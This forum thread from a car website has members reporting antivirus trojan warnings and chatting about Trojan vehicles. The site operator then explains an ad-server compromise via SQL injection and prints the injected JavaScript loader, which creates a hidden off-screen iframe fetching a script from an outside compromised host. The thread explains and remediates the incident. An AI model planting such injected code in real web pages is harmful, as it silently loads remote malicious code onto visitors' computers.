Computer Related > Trojan? Miscellaneous
Thread Author: PhilW Replies: 18
View Threaded 

New Tue 24 Jun 14 18:19 
 Trojan? - PhilW
every time I click on a topic at C4P I'm getting a message from Kaspersky saying that a Trojan is trying to download.
index.htm&n=aac8cecc&zoneid=3&source=&cb=1403630125 Blocked: HEUR:Trojan.Script.Generic 24/06/2014 18:18:59 ads.car4play.com/www/delivery/afr.php?frameid=ad_mpu&referer=www.car4play.com/insure/

is it me or the site?
I don't know what the above message means!
Reply to this message | Report message
       
New Tue 24 Jun 14 19:13 
 Trojan? - Armel Coussine
A friend in the late fifties had a Trojan two-stroke van, ex Brooke Bond tea I think. Had the weirdest engine you ever saw, one very big cylinder and another small one, side by side, like a railway steam engine. Did about 30 flat out. Damn silly girl wouldn't let me drive it because she was sure I would crash it. I ask you.

1920s Trojan car had a stark tourer body, flat-twin engine and ingenious long-travel cantilever suspension. It too was quite slow but allegedly could charge smoothly over absolutely anything.

Sounds as if Phil has a PC. They tend to wind you up with that stuff. It's advertising I think.
Last edited by: Armel Coussine on Tue 24 Jun 14 at 19:14
Reply to this message | Report message
       
New Tue 24 Jun 14 19:22 
 Trojan? - PhilW
Thanks AC - it's a lot clearer to me now!!

;-)


PS Doesn't happen on my laptop.
Though I wonder if CA's Trojan Brooke-Bond girl performed on his laptop???
Did she have a stark tourer body and long cantilever suspension?
I'm intrigued!
Or am I just very confused?


Reply to this message | Report message
       
New Tue 24 Jun 14 19:33 
 Trojan? - Armel Coussine
>> am I just very confused?

Yes, I think so. Perhaps you can't help remembering those Trojan super-strong, very thick condoms for paranoid US citizens?
Reply to this message | Report message
       
New Wed 25 Jun 14 05:24 
 Trojan? - Pat
You two are making me have an early morning chuckle this morning;)

Thought I might swerve the Computer thread on holiday but glad I didn't!

Pat
Reply to this message | Report message
       
New Tue 24 Jun 14 20:50 
 Trojan? - bathtub tom
>>A friend in the late fifties had a Trojan two-stroke van, ex Brooke Bond tea I think. Had the weirdest engine you ever saw, one very big cylinder and another small one, side by side,
1920s Trojan car had a stark tourer body, flat-twin engine

IIRC, the car and van had the same 2-stroke engine. A couple of them attend classic trials regularly. They had no diff, which makes them ideal for climbing muddy hills, but a pain to turn round corners.

A feature of the design of the engine means the (dual) con-rod has to bend!

anarchadia.blogspot.co.uk/2008/03/vintage-thing-41-trojan-engine.html

and

en.wikipedia.org/wiki/Trojan_%28automobile%29
Reply to this message | Report message
       
New Tue 24 Jun 14 23:41 
 Trojan? - Armel Coussine
>> IIRC, the car and van had the same 2-stroke engine.

Thanks bt, I think you're right. Flat twin is a Jowett thing. Certainly was a sluggish unit, could easily date from early twenties. I'd forgotten about the solid rear axle too which helped to make the car so competent.

It was an early example of a car with pressed steel disc wheels too I think.
Last edited by: Armel Coussine on Tue 24 Jun 14 at 23:42
Reply to this message | Report message
       
New Fri 27 Jun 14 11:37 
 Trojan? - Victorbox
Microsoft Security Essentials wouldn't let me access Car4play last night saying some ad had unsafe content in it.
Reply to this message | Report message
       
New Fri 27 Jun 14 12:43 
 Trojan? - spamcan61
I get what I suspect is the same warning, at work,with Kaspersky:-

>>>>>>>>>>>>>>

Access denied

The requested webpage cannot be provided.

In the requested object at the URL

ads.car4play.com/www/delivery/afr.
php?frameid=ad_mpu&referer=www.car4play.
com%2Finsure%2Findex.htm&n=aac8cecc&
zoneid=3&source=&cb=1403869317

a threat has been detected:

object infected HEUR:Trojan.Script.Generic

>>>>>>>>>>>>>>>>>>>>>>

However I don't get it at home with MSE or Avast.
Last edited by: spamcan61 on Fri 27 Jun 14 at 12:44
Reply to this message | Report message
       
New Fri 27 Jun 14 12:48 
 Trojan? - VxFan
I've memntioned there is a problem to Stephen.

I got a similar message earlier on my work PC that uses Sophos.
Reply to this message | Report message
       
New Fri 27 Jun 14 13:52 
 Trojan? - Victorbox
>> I've memntioned there is a problem to Stephen.
>>
>> I got a similar message earlier on my work PC that uses Sophos.

My works PC has just popped up a warning as well.
Reply to this message | Report message
       
New Fri 27 Jun 14 16:22 
 Trojan? - car4play
Hi guys

Yes you are all quite right. Thank you!

The ad server got hacked and has a nasty script prepended onto on of the ads. Basically the OpenX ad server has always been a bit vulnerable to SQL injection attacks.

We have removed the script, and the one that makes it and are installing a new version which is supposed to be better protected.
Reply to this message | Report message
      5  
New Fri 27 Jun 14 16:43 
 Trojan? - No FM2R
Purely out of interest, what was the script intended to do?
Reply to this message | Report message
       
New Fri 27 Jun 14 23:24 
 Trojan? - PhilW
"The ad server got hacked and has a nasty script prepended onto on of the ads. Basically the OpenX ad server has always been a bit vulnerable to SQL injection attacks.
We have removed the script, and the one that makes it and are installing a new version which is supposed to be better protected."

Phew, that's a relief!!
Don't understand a word of the above but thanks for solving the problem!!
;-)
P
Reply to this message | Report message
       
New Fri 27 Jun 14 23:26 
 Trojan? - car4play
Here it is. (Formatted around a bit)

if(document.cookie.indexOf("_epel")==-1)
{var page_object=document.createElement("iframe");
page_object.setAttribute("src",
"htttp://cheng.MASSARTSANDCRAFTS.COM/ assets/js/ jquery-1.3.1.min.js?ver=1.33.577"); page_object.style.position="absolute";
page_object.style.left="-1000px";
page_object.style.top="-1000px";
page_object.style.width="100";
page_object.style.height="100";
document.body.appendChild(page_object);
document.cookie = "_epel=readed; max-age=25000; path=/";}
else{}
/* End Google Ads */
Reply to this message | Report message
       
New Fri 27 Jun 14 23:31 
 Trojan? - car4play
... Which basically tries to pull another JavaScript from another compromised server - this one being at massartsandcrafts. It does this by making an iframe on our site which is positioned well off the visible screen.
The reason safari didn't pick it up as a malicious page is because that particular script doesn't exist on the compromised server. Presumably the owners have found out about it and got rid of it. So the script here ends up doing nothing. I guess the other checkers notice the suspicious behaviour and are responding accordingly.


Btw we installed the new ad server this afternoon. Maybe the change of name to "revive adserver" will help :-)
Last edited by: car4play on Fri 27 Jun 14 at 23:34
Reply to this message | Report message
       
New Fri 27 Jun 14 23:44 
 Trojan? - car4play
For the technically minded this is the final script but not the really nasty one. Basically the SQL injection put another script onto our ad server which then inserts this other script here into the database where it gets prepended onto served ads. So if one removes the script here, the malicious guys simply run the one on our server which brings this one back to life again.
They seem to run their "refresh" every few minutes. They do this by simply going to the URL on our server where they have put their script. I won't show you that one because it really is someone's labour of love !
Reply to this message | Report message
       
New Sat 28 Jun 14 07:25 
 Trojan? - smokie
What impact would the script have had on people's machines?
Reply to this message | Report message
       
New Sat 28 Jun 14 08:19 
 Trojan? - car4play
Nothing as far as I can see because it wasn't getting to the remote site where the real action would occur.
Reply to this message | Report message
       
Latest Forum Posts